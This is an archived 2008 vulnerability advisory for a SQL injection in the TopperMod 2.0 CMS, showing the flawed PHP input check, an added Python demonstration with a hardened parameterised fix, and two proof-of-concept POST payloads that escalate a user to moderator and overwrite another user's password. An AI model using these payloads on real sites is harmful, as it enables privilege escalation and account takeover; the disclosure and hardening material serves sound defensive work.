ID: SECURITYVULNS:DOC:19525
Title: TopperMod 2.0 Remote SQL Injection Vulnerability
Type: securityvulns
Reporter: Securityvulns
Published/Modified: 2008-03-27
Description
Author: GiReX
mySite: www.r57shell.in
CMS: TopperMod v2.0
Site: www.wikipediatr.com
Bug: SQL Injection
Type: 1 - Privilege Escalation (from user to mod)
      2 - Remote user password change
File: /account/index.php
Var : $localita
Need: magic_quotes_gpc = Off
You must be logged in
Vuln Code: /account/index.php:
case "edituser_save":
...
$localita=$_POST['localita'];
...
if ($localita!="") {
if (eregi("^[a-zA-Z0-9]",$localita)) {
$localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
}
}
And what if $_POST['localita'] does not begin with a letter or a digit?
The eregi() check fails, the escaping branch is skipped, and the input reaches the query unsanitized.
...
$res=dbquery("UPDATE ".PREFISSO."_utenti SET email='$email', localita='$localita', sito='$sito',
tema='$tema_user', time_zone='$time_zone' $pass
WHERE user_id='$user_id' ");
Vulnerable query :D
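To make the defect concrete, the following is an added illustration (not code from the advisory or from TopperMod) that reproduces the flawed first-character check and the string-built UPDATE against an in-memory SQLite table, and sets a hardened version beside it. The table name utenti, the column names and the sample row are constructed assumptions; Python's html.escape stands in for PHP's htmlentities(htmlspecialchars(...), ENT_QUOTES), which is close enough to show why the escaping only helps when it actually runs.

```python
import html
import re
import sqlite3


def make_db():
    """Constructed stand-in for the CMS's <PREFIX>_utenti table (assumption)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE utenti (user_id INTEGER PRIMARY KEY, email TEXT, "
        "localita TEXT, permessi INTEGER)"
    )
    # One ordinary (non-moderator) account: permessi = 0
    con.execute("INSERT INTO utenti VALUES (7, 'user@example.test', 'Rome', 0)")
    con.commit()
    return con


def sanitize_original(localita):
    """Mirrors the advisory's check: escaping runs only when the value STARTS
    with an alphanumeric character; any other value passes through untouched."""
    if localita != "" and re.match(r"^[a-zA-Z0-9]", localita):
        return html.escape(localita, quote=True)[:20]
    return localita


def update_vulnerable(con, user_id, email, localita):
    """String-built UPDATE, as in the advisory: user input lands inside the SQL."""
    localita = sanitize_original(localita)
    sql = (
        f"UPDATE utenti SET email='{email}', localita='{localita}' "
        f"WHERE user_id='{user_id}'"
    )
    con.execute(sql)
    con.commit()


# Hardened version: validate the WHOLE value, then keep data out of the SQL text.
LOCALITA_RE = re.compile(r"[A-Za-z0-9 ]{1,20}")


def update_hardened(con, user_id, email, localita):
    """Reject anything that is not a short alphanumeric string, and bind the
    remaining values as parameters so no input can change the query's shape."""
    if localita != "" and not LOCALITA_RE.fullmatch(localita):
        raise ValueError("localita rejected by validation")
    con.execute(
        "UPDATE utenti SET email=?, localita=? WHERE user_id=?",
        (email, localita, user_id),
    )
    con.commit()


def permessi_of(con, user_id):
    """Read back the privilege column so the effect of each update is visible."""
    row = con.execute(
        "SELECT permessi FROM utenti WHERE user_id=?", (user_id,)
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    payload = "@', permessi='1"  # the advisory's PoC 1 value
    con = make_db()
    update_vulnerable(con, 7, "user@example.test", payload)
    print("vulnerable, permessi now:", permessi_of(con, 7))  # 1: escalated
    con = make_db()
    try:
        update_hardened(con, 7, "user@example.test", payload)
    except ValueError as exc:
        print("hardened:", exc, "| permessi still:", permessi_of(con, 7))  # 0
```

Two things are worth noticing when running it. A payload that starts with a letter, such as "x', permessi='1", is neutralised by the original code because htmlentities turns the quote into an entity; the bug is purely that the check is on the first character instead of the whole value, so "@" at the front bypasses it. The hardened update would stay safe even if the validation were dropped, because the parameter binding never lets the value become part of the SQL statement; the validation is defence in depth, not the fix itself.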
PoC 1:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]
PoC 2:
POST /[PATH]/mod.php?mod=account HTTP/1.1
Host: [TARGET]
...headers...
email=someone@somewhere.dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]
Note: [PASSWORD] must be md5(md5(<wanted password>)); leave out the closing quote in the payload, since the original query supplies it.
We could also try to retrieve the admin hash through SQL subqueries, but the password is hashed with md5 twice
and admins don't use cookies in this CMS...